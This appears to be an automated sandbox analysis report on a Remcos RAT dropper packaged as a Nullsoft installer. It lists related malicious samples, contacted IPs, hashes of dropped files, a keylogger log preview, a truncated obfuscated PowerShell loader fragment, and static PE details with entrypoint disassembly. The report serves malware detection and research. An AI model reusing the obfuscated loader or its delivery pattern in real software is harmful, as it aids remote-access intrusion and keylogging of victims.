	SwiftCopy_PaymtRecpt121224.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	4JwhvqLe8n.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	fIPSLgT0lO.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	IXCbn4ZcdS.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	d7gXUPUl38.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.217.215.102 108.177.122.132
	PO_11171111221.Vbs.vbs	Get hash	malicious	FormBook	Browse	172.217.215.102 108.177.122.132
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.217.215.102 108.177.122.132
	CMR ART009.docx	Get hash	malicious	Unknown	Browse	172.217.215.102 108.177.122.132
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.217.215.102 108.177.122.132
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.217.215.102 108.177.122.132
	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	172.217.215.102 108.177.122.132
	0TGy7VIqx7CSab5o.lNK.lnk	Get hash	malicious	Unknown	Browse	172.217.215.102 108.177.122.132
	c2.hta	Get hash	malicious	XWorm	Browse	172.217.215.102 108.177.122.132
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.217.215.102 108.177.122.132

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.440824925520913
Encrypted:	false
SSDEEP:	6:6lZNlHole55YcIeeDAlOWA7DxbN2fxlx5Mm0v:6l5Yehec0WItN2Lx5Ml
MD5:	F59F4C892F6A093A9B2380D10B20B033
SHA1:	2276D769130A8D2A61DA9F328F871BF18DB8E86B
SHA-256:	2381D8156A9DC518DFFA0A84F2D0EA9D89E00A99264395C06AB7C7EC0740545C
SHA-512:	1DFBE6333990212F4A5DC65CE58CDA3BDD1C866B9FE7B5CDF10371DF0ADB39F115AAA869C9082D7AE56CC89C3C211E8F8CAA768A42522553BA289FEC76073A54
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\aksloest.dat, Author: Joe Security
Reputation:	low
Preview:	....[.2.0.2.4./.1.2./.1.3. .0.2.:.5.0.:.4.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.1.4.1.2. .m.i.n.u.t.e.s. .}.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\json[1].json

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.00819003742181
Encrypted:	false
SSDEEP:	12:tkl/jond6CsGkMyGWKyGXPVGArwY3vJv+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkv:qlb4dRNuKyGX85WJ+vXhNlT3/7+GeWro
MD5:	AFF25EB004F80DFC3CAFE28617E0AE3E
SHA1:	C5F14301AF9F222668697EF791009508C3E64080
SHA-256:	CEF2F365472FAF304437B90B061A895D3C458E07CEE301EB0810C0E6085FE92B
SHA-512:	F3DB037CD6ABD62B35A24AA600B6842CAC20DBD0335E3DBAE6815C6CFDBE5CD2AE6433E4ABD2F611EFED5875147842EB33718C56A1F8BE562BE470A1DD474A4B
Malicious:	false
Reputation:	low
Preview:	{. "geoplugin_request":"89.187.171.165",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Atlanta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"33.7485",. "geoplugin_longitude":"-84.3871",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.990428309401091
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdB4NXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdB4NZiA
MD5:	A3F4A4CED5E4717EA59EEDAAA642F0CF
SHA1:	EB40B4929869C8C2A8866A0F06AE166F406FE493
SHA-256:	59B8E05483EA0D66C8F98CB27508791C4066743462559CE29BBF658DD88BEC0E
SHA-512:	804565218357E45BBFEE9661AF75E9941B54E1B6AA656DE02E57A0842BCA8E679F2250E004B4FF7705F4A22C65F9A3A48AF9614A851D8C062DF4DA3B99A67257
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chftv1n0.ru4.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ig4b1pav.xyn.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5z1rkua.nqy.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tagkgho1.q4e.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\woady\roadshow\Barrelwise.dve

Process:	C:\Users\user\Desktop\x295IO8kqM.exe
File Type:	data
Category:	dropped
Size (bytes):	345318
Entropy (8bit):	1.2552815277581528
Encrypted:	false
SSDEEP:	768:R40G2RKf9t/qm9R6GVLqqtO3MwGKFR/LvYfF6BlpaFeiJTnn8rPOjVsO2rgqziIJ:TKN33+DU4iIhkBLaN4hbQA/teZ
MD5:	D631BA9F3FC2531BE1EB2F3456796E22
SHA1:	148DE71666FEAE61A980EBE145997C7A4AFE14BA
SHA-256:	7D262CC8D06EB8682B3E3F58C3EB37B33C8376AA7FE0B23A7A4D0F5BBEEDCE85
SHA-512:	A27825EFCB2A1EC077196173B6E694715847770D07F202714817DAD57541187347A10EE376161E088CBDD790F014F998301FED589BA898DAF53ECF102C773FD8
Malicious:	false
Preview:	..v.........................................................H.......................................S.........?...................................................................c........].................).......g...$.................................................m..........................P..........................................0.....u............. ...............d.......................................2.....r...T.......................................................................................+...p........................................................*..................k....\....O...............S..........................................=.......................................e...............................+.....................................q...........................!........`......l...................................c..........Q..................9......_........!..q.........................................}.........................................................

C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt

Process:	C:\Users\user\Desktop\x295IO8kqM.exe
File Type:	ASCII text, with very long lines (4279), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	73222
Entropy (8bit):	5.196773964749615
Encrypted:	false
SSDEEP:	1536:Z3ayvkGAI/1VnqmuyXfl95Tx9PPM0Iwe0ArfP4lfvg2c:Z3ayMGAINVqmuAfl3Tx9c0tYn4hva
MD5:	6496B0F233D8E97B72FB1E7B8405ACB0
SHA1:	4D80619F2FABDBBCCC119F4EADD73732AC1E08D0
SHA-256:	EA6F13FC1E413210BC127214D93C9AD5745DADA6E4181E23086E1C03417D2250
SHA-512:	C3B75BD7333BEBD1A58765A329BDBF6E25062386C252D9594ACF2AB6157E1D8B33B5D9E2498A45D5DF553C41B8B937695947773F521A17A90D088F443C4E3FB8
Malicious:	false
Preview:	$Lseprve=$Prairieweed;..<#Sangerindes Kontorlokaler Admitteredes Guardstone Taxachauffr #>..<#Choreographs Emphlysis Tyranniers Dvrgvkster Unsectionalised #>..<#urimeligeres Prelicenses Ydmygste Paintroot trvegravens #>..<#Hemisfres Dhobey Turkologist Unsoot Indskrivningsarbejdernes Massakrerede Flamingoen #>..<#Vl Bilirubinemia Pladsholderfelts Nonsynoptical Retears flertrinsrakets #>..<#Afskrivningsvelsens unelevated Illiberality Timist Affej Reobjectivize #>...$Nunnify = @'.afstraf.Bygrnse$Kod kisUS,onslunRudev,scFornjelhForfrdeaBuegangnSanseapgFartesseIdon alaBravesobThriverlIntercey profit=Concord$Vavas rKCardionnTantiemoKulbuelsregretfpBloodmoa Ste.fal subt,rdOplodrehPraedike AnaphyaImanueldRombepo; Proton.El,tistfEnk ltpuDardskinGdskendcLukewart Hipomai Mat looUnseismnUnvital B.oodnoDMensegreHoc eyspRenskrioExecutisGruppeti ulpunktOo,phsduMazef,lm Trlsoms FeltspbUn avoreX,vclunvFangebui DisaugsKaliumke SuppesrBusgadesBesttel1futuris3 Serial8 Antice Aakirke( Pterid$Akseltrf Korp,

C:\Users\user\AppData\Roaming\woady\roadshow\Eskaperes.Bog

Process:	C:\Users\user\Desktop\x295IO8kqM.exe
File Type:	data
Category:	dropped
Size (bytes):	431740
Entropy (8bit):	7.644935415631374
Encrypted:	false
SSDEEP:	12288:c1zUqvApIRXyOZ2Gik1rnjkzcyoH4m0dfr0:cUAApwZIkhjqVoH4m0dfr0
MD5:	15EE32F7FCED24502F1CFDA83BC30564
SHA1:	A8966BE8B3524E3A91CF50F0EBB108D5862B4945
SHA-256:	FD74364F0AD6D6C8756B735C011E2722F3445F97B6380A5ECFC06CF2C4C4CE1D
SHA-512:	F2AF6F0723B19DF66105B68660F45C4B1D1E24CB1E9334ECEC31DEA9724A6AB69DF83B975EF4C60E131F44286A6A95945ADD54C390C7C964F029090F9F904162
Malicious:	false
Preview:	....b............tttt.......S.....,,,......7....999...uu..}.............iii...................................NN...vvv..................ooo............mm. ....d.......P...=....ff..........k................\\\\\\\......mm............................2222...............................:......==..........Y..................nnnnn...........................................q.2..b.............................Q.6.kk....8...............................................r....RRRR.....9.~...___.8..................o................xx............................00.......{.........ZZ..............*................!..............+.............SSS..t..`..l...QQQ.....b..33............''''........W.................[[[....n......U......)......8.{{................++..h............G....{...................?.@..............................................UUU.....p.................11..i...........................................Y.f...............fff.O............................g....T..ddddd....9.U..........9

C:\Users\user\AppData\Roaming\woady\roadshow\Paganity.txt

Process:	C:\Users\user\Desktop\x295IO8kqM.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	517
Entropy (8bit):	4.28695415263639
Encrypted:	false
SSDEEP:	12:AFxklsruXF8mxfw7jypcWsxJRLDP+2dRXlLYfRiMojPuriVXaO8LGM8AYBRwirZm:AeY8F8mxI7Ggz+2rFY5zdiVaF8AYBRFo
MD5:	29E15243C8EC49A2171D36C391321AE6
SHA1:	9EEFCFEE919E2A0D89DC0B97F4085B783F509EF1
SHA-256:	CD0477C515C42581AEF982E4638AF7D834EDF35E05E2A86F9B0DE789504A8AB3
SHA-512:	936E9E5903C112FFE9D0E644448E8C0829F27A4C8CCF282CBF40BD4780D3770BF8F9B504805A23FC5126AEEDE2EFDE1036E40625308D8A98FD559117AF84F30F
Malicious:	false
Preview:	calc frergruppe arkaismen kreskoler sekvensnummers galena iterationernes navicerts twills advertency..interavailability outpulls gennemskrivningerne emancipationstrangs navajos,reedify fortvivlelsens socialitetens livvagter husblasens iodids..eklektikere preadjectivally hypervitalizations apsu.altsaxofonerne sleepwalker plentifully skyldsprgsmaalene forureningsbelastnings kokottes panoramic chaconner reguladetri elektrisering..newyorkeres copsewood detektiver anthologist sikkerhedstjeneste analyseforms alcohols.

C:\Users\user\AppData\Roaming\woady\roadshow\Roamage\Pelsdyrs78.sul

Process:	C:\Users\user\Desktop\x295IO8kqM.exe
File Type:	data
Category:	dropped
Size (bytes):	242790
Entropy (8bit):	1.2523928432688356
Encrypted:	false
SSDEEP:	768:DII5cq3LYeeYqRIebHX8Y3JlYSdc8KILIQZmoiLFPQ9tfpjptwEbTlPHFayB1gY3:hejbeQ1rwOKFE9R
MD5:	F1636842411072037DE463D4AE982587
SHA1:	CED8C7FB442655B7C56F83A93698C313FD8BFD0E
SHA-256:	322D45C0EA26612607DCAE2499F52562949AC9E1AA54A1EBAB0B8EF5130647F4
SHA-512:	1D0686F8847AAFC1763968EAB79611E764A79ECDBEFF80798325E417E7298281CB317BC4EB5382F294A9024EE0E964BF196287D5168578C20419767CBC2B68AC
Malicious:	false
Preview:	...............................................1.....................................................................................................4.................[..\|........U..................................E.......................................................M...................s)......u.................................$................8..............E................0............;...................................................D..................{...............................................8.....<...r........3..0.........]........................U........s.............V.........!...............................:.........n......4......................................:....................................................^..............z......j.................................t.o................................. .....".............................................Y...........................................................z...................................................

C:\Users\user\AppData\Roaming\woady\roadshow\beedigelsernes.smu

Process:	C:\Users\user\Desktop\x295IO8kqM.exe
File Type:	data
Category:	dropped
Size (bytes):	421406
Entropy (8bit):	1.2497656660112648
Encrypted:	false
SSDEEP:	1536:T3O5HFns+AagJrEiTnkpBy8tXRloz59eBqrcR:ToYrEiTkLyCBlozr
MD5:	558E7F447D2CEFDE136F69DFA6BBD6F8
SHA1:	32F1B96D23838B5B9A06D411A6BDECA19017276C
SHA-256:	0AF726ED20E9AE154BF09DC68A80E145B328A3BCE63DB3620B2C03489A12E157
SHA-512:	1A1D137F368B7BA17DCAFF109BA501719CE1C3604B74815F63C8AE9D3D5AF1A17FA7D084A9DF9AEF245D9E45A0FE8E50592EF64C37E8F105A74F1136CF8B309D
Malicious:	false
Preview:	....[.................................................................z..................................................................=.................X.....(.... ..........................................................................................4...........................S.......................G..........\...................%v.........................~.......x........$....................V.........................................................................................I.o..............................................................................................................................................].............e..................f........................... ...........................'....?............y.......,..........................V.....L.......................................................b...................{...............................................................................................J..l..........................'.........

C:\Users\user\AppData\Roaming\woady\roadshow\isonitramine.ste

Process:	C:\Users\user\Desktop\x295IO8kqM.exe
File Type:	data
Category:	dropped
Size (bytes):	347611
Entropy (8bit):	1.2637158874478889
Encrypted:	false
SSDEEP:	768:aBdieg0m7BZ1J9gccyxpAx+TnC58A3cd9kW+08rTYgcnfb40ZOL8yV08rg7l7/fO:Pblbd8lYWYBVcqW5ainT5j
MD5:	085072D5A06045F20E39D2677C2DF661
SHA1:	D3516D4DD491B98985229F2E2C63EF60C393324B
SHA-256:	3D6D6062D5866D5044F9A402443046EC9BBD3477247F576A509425A4C37BA5A5
SHA-512:	9292B6260CFF9328171AEAE8C904268EE4637DD290D969048168242DC6F8F0FC5E6EAB478CAA1E1EE1F8FD63E0FC3FD47B3DF435A6DD5296C682D3053E8EC4CC
Malicious:	false
Preview:	.............................................................................j...................m................:.............A...............................................................................o4..................... ............................................................}..............................g.......................-.........................................................;..........B..'........S................W..........:....................[..........D..........................................o..................(.................G...x.........................................................+........................... .................................I..................}.m.......9.............0...........q....?..<....U.....................................v...................w.................................................................F.....................R....................A................................................................S.......

C:\Users\user\AppData\Roaming\woady\roadshow\miljproblemerne.fyr

Process:	C:\Users\user\Desktop\x295IO8kqM.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 42535295865117307932921825928971026432.000000
Category:	dropped
Size (bytes):	216675
Entropy (8bit):	1.2568145689844663
Encrypted:	false
SSDEEP:	768:z1qHQGWXg6kQ37VkNAph5N/jlvAcGqYPxLGKNzqua+/bg7/sY7PKlGaBKQdMLbaO:BO/10gpLH8gcw45NrrG
MD5:	99322017D6047E10C197404E4BEE8E49
SHA1:	9074195B58B1FAD209AEB626AE388478D3C95BD7
SHA-256:	933FD146A379E83E28A56FB34767BC341CD35EF400B81720B42ED04806A6301B
SHA-512:	8A18F1B4CD8945F9173FA7244DE7DFCEE2BA8A73B9B7DD8014AA55D60563006CA4A1311F0261125B8CDE9EF5754212BF725B4A74EF4FF3380F79283F94FB02E9
Malicious:	false
Preview:	............................................s......................................................................................................................$......,........U...................y..........................Q........................................................................R.......l...............L...............j...............C..............................Q...........:..............................................................................+...............I...@..............................+.....................................k...............o..........a...........w.............I..............................6.................r......................!....................*.........................................c..................................................>....................5.....,...............~....$...........#...................\........................+...;......................y..............................................................

C:\Users\user\AppData\Roaming\woady\roadshow\stilvelses.las

Process:	C:\Users\user\Desktop\x295IO8kqM.exe
File Type:	dBase III DBT, version number 0, next free block index 524288
Category:	dropped
Size (bytes):	399862
Entropy (8bit):	1.2528103191788533
Encrypted:	false
SSDEEP:	1536:/TWzMETKRf3PYuaN4LZRkUwLJU8YsQxi0329bzF:EMEYffXaN4LZRkUwPQxLG9bz
MD5:	4BF0A3825CAD70890226D0E19A627D6F
SHA1:	76379634B52BF9E0A2B3899D898B7F3D90211C8B
SHA-256:	672056535A58F5B0C32ECA0CD8B16F789B99CF6DC59A3BFF17A8D10ADBFE43C0
SHA-512:	9A8FA390D411DA12946A8883DC72360C276CCEEDE69B1CA6BA035EF2A101A96E8021D4362F275CB3518CE9C3A2EF1CEFC4F53B900B9B36417065203285F01F18
Malicious:	false
Preview:	......................................................W.A......p.....................$.........................................................5h....................x..................A.........................................R...B.....................................S.................Q............................................................................................................................................................................................I...........................................................................V..,........q..................z..........m......%..............>...........................................................................a3.............0.o....................C.............................................................*............R}............................................8..................#..\..9......................3......0..................................n...........................................................

C:\Users\user\AppData\Roaming\woady\roadshow\untowardness.lad

Process:	C:\Users\user\Desktop\x295IO8kqM.exe
File Type:	data
Category:	dropped
Size (bytes):	316359
Entropy (8bit):	1.252132386894124
Encrypted:	false
SSDEEP:	768:0HBsdgdzXHL7b0z5dlku1v9mUKs6euLzaI0uP66CywW+KByir/syHfTN63mTozXf:jm+rJOvYmaMQx0OWw
MD5:	7867E4681C981D4554C6AF7DD0D2C908
SHA1:	BA79D1357963350803AA9B3264D12BB5076F6A7C
SHA-256:	7206FB671880131F18F6B60DADDC4E270B5578898515F15A8B8930015BD59BE6
SHA-512:	D6500314EB8FEA24BAD4D64CE476094B666D0F66C7D7A691AB0548F1EF62759DBF8AA1932431D4D8B09895F00E79D60164C71F8DF8A38EE0252594411F7C2067
Malicious:	false
Preview:	..<.........................M...............................E.'.....G.......t.....(.....d.rK....................................... .................................................8..................&.......T...........................J,................................................0.............S.............R......................................................................n.................................................................................................`...........................................................................s....................u...........7.....................x..3......\|................[.....................................................................x............2............................................C.....I.......`...................................Y..............r..................................................................4..........................................................................................5......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.755431424414754
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	x295IO8kqM.exe
File size:	1'044'016 bytes
MD5:	3e4417c519a6dc532e433ad673bfa553
SHA1:	a724189bc732612dd68bc0ce7f7ac9ffabbd89b9
SHA256:	6e3fa4568a26535e48ab78ab8cc6e63fc96eb9262097f85d8c66d580dd7cd167
SHA512:	798fe3ed267aeee8378666e7d986855eebb2d5de45100fc8b34ce1e62464e64e62889b7d58f1a69e2404a8e78266d7dd5e55115a053b284bc1c8c9317f9d497c
SSDEEP:	24576:SebTzoICQUf46BCnFSRopbwUg+ygUEFD70+LS:SebTzHCQUA6BCnF6+bg+ygNDQ+2
TLSH:	6C257A195D6EE817EBA14673717B94DA611C6CC5A3F020FF2B05306B252CBE882F716E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..OP.._...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@

File Icon


Icon Hash:	7140457192753373

Static PE Info

General

Entrypoint:	0x40326a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57956391 [Mon Jul 25 00:55:45 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e2a592076b17ef8bfb48b7e03965a3fc

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Farmage, O=Farmage, L=Ilheu, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	28/09/2024 09:05:03 28/09/2027 09:05:03
Subject Chain	CN=Farmage, O=Farmage, L=Ilheu, C=FR
Version:	3
Thumbprint MD5:	DA6D32247BE6553CED61F875C82BD44E
Thumbprint SHA-1:	A2E7E57741442428F75FE1BD361A4E69364E98E5
Thumbprint SHA-256:	94A96E07532156A2ED953AB891E14F43321AA6B05200F26CED2F62F2A7A899E7
Serial:	16D199DBB787CA8A887AC166AC8541D0979BE830

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 004092E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F99042EB853h
push ebx
call 00007F99042EE994h
cmp eax, ebx
je 00007F99042EB849h
push 00000C00h
call eax
mov esi, 004072B8h
push esi
call 00007F99042EE90Eh
push esi
call dword ptr [0040715Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F99042EB82Ch
push ebp
push 00000009h
call 00007F99042EE966h
push 00000007h
call 00007F99042EE95Fh
mov dword ptr [00429204h], eax
call dword ptr [0040703Ch]
push ebx
call dword ptr [004072A4h]
mov dword ptr [004292B8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004206A8h
call dword ptr [00407188h]
push 004092C8h
push 00428200h
call 00007F99042EE548h
call dword ptr [004070A8h]
mov ebp, 00434000h
push eax
push ebp
call 00007F99042EE536h
push ebx
call dword ptr [00407174h]
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x48000	0x2b4a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xfe548	0x8e8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ff9	0x6000	34f0469eb860d5ecf0e52ef9d3820a60	False	0.6667073567708334	data	6.4734859396670705	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x13a4	0x1400	848ecd58951d0a4cfe8ec8cfce6b20d1	False	0.452734375	data	5.125569346027248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202f8	0x600	3953dbb7217e7539ee75e90871f7aef9	False	0.4947916666666667	data	3.9050018847265378	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x1e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x48000	0x2b4a0	0x2b600	901cd8d933095b041c4d5ad99c406b66	False	0.18056556195965417	data	4.754114267912815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x48388	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.07176446232106944
